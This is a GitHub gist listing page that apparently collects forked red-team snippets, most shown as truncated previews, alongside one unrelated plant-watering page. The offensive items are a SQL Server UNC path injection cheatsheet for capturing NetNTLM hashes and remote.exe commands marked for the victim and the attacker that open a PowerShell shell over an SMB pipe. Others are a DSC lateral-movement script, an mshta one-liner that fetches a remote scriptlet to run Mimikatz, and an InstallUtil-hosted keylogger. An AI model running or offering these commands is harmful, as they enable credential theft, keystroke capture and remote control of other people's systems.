unbaiat’s gists

unbaiat / auto_water.py

Created May 7, 2018 13:44 — forked from benrules2/auto_water.py

unbaiat / main.html

Created May 7, 2018 13:44 — forked from benrules2/main.html

	<!DOCTYPE html>
	<head>
	<title>{{ title }}</title>
	</head>

	<body>
	<h1>PLANT HELPLINE</h1>
	<h2>The date and time on the server is: {{ time }}</h2>
	<h2> {{ text }} </h2>
	<a href="/auto/water/ON"><button>Turn ON Auto Watering</button></a>

unbaiat / SQL Server UNC Path Injection Cheatsheet

Created April 7, 2018 12:44 — forked from nullbind/SQL Server UNC Path Injection Cheatsheet

SQL Server UNC Path Injection Cheatsheet

	This is a list of SQL Server commands that support UNC path [injections] by default.
	The injections can be used to capture or replay the NetNTLM password hash of the
	Windows account used to run the SQL Server service. The SQL Server service account
	has sysadmin privileges by default in all versions of SQL Server.

	Note: This list is most likely not complete.

	-----------------------------------------------------------------------
	-- UNC Path Injections Executable by the Public Fixed Server Role
	-----------------------------------------------------------------------

unbaiat / all.txt

Created March 25, 2018 06:52 — forked from jhaddix/all.txt

all wordlists for every dns enumeration tool... ever.

unbaiat / Inject.cs

Created March 21, 2018 05:12

DotNetToJScript Build Walkthrough

	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Text;

	public class TestClass
	{

	public TestClass()
	{}

unbaiat / gist:76ecf73812c291d2f63414a124ec0ec9

Created March 18, 2018 11:59 — forked from mattifestation/gist:8ef36782ceb7f73d74cfb00c2a710301

remote.exe - a useful, MS signed SMB shell

	# Command to run on the victim
	# This will establish a PowerShell listener over the "pwnme" named pipe
	remote /S "powershell.exe" pwnme

	# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client)
	runas /netonly /user:[Domain\|Hostname\Username] "cmd"
	remote /C [Hostname\IP] "pwnme"

unbaiat / PowerShellDSCLateralMovement.ps1

Created March 18, 2018 11:56 — forked from mattifestation/PowerShellDSCLateralMovement.ps1

	# This idea originated from this blog post on Invoke DSC Resources directly:
	# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/

	<#
	$MOFContents = @'
	instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
	{
	ResourceID = "[Script]ScriptExample";
	GetScript = "\"$(Get-Date): I am being GET\" \| Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
	TestScript = "\"$(Get-Date): I am being TESTED\" \| Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";

unbaiat / PowerShellHostFinder.ps1

Created March 18, 2018 11:55 — forked from mattifestation/PowerShellHostFinder.ps1

	# Author: Matt Graeber, SpecterOps
	ls C:\* -Recurse -Include '.exe', '.dll' -ErrorAction SilentlyContinue \| % {
	try {
	$Assembly = [Reflection.Assembly]::ReflectionOnlyLoadFrom($_.FullName)

	if ($Assembly.GetReferencedAssemblies().Name -contains 'System.Management.Automation') {
	$_.FullName
	}
	} catch {}
	}

unbaiat / mimikatz.sct

Created March 17, 2018 04:04

Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"

unbaiat / InstallUtilMouseKeyLogger.cs

Created February 27, 2018 04:38

Input Capture - InstallUtil Hosted MouseClick / KeyLogger -

	using System;
	using System.IO;
	using System.Diagnostics;
	using System.Windows.Forms;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;
	//KeyStroke Mouse Clicks Code
	/*
	* https://code.google.com/p/klog-sharp/
	*/

unbaiat unbaiat